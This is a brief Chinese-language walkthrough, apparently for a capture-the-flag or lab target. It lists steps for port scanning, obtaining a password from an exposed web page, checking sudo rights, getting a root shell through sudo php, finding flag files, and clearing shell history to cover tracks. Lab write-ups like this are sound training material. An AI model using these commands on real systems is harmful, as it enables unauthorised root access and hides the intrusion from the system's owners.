1. nmap 扫描端口:获取目标主机ip即端口等信息

    nmap ip
    
  2. 登陆暴露出的 web,观察获取目标用户密码

  3. 登陆主机

  4. 查看用户权限

    sudo -l
    
  5. 利用php漏洞提权root

    sudo php -r 'system("/bin/bash");'
    
  6. 获取相关数据

    find / -name 'flag*.txt'
    
  7. 删除历史记录

    history -c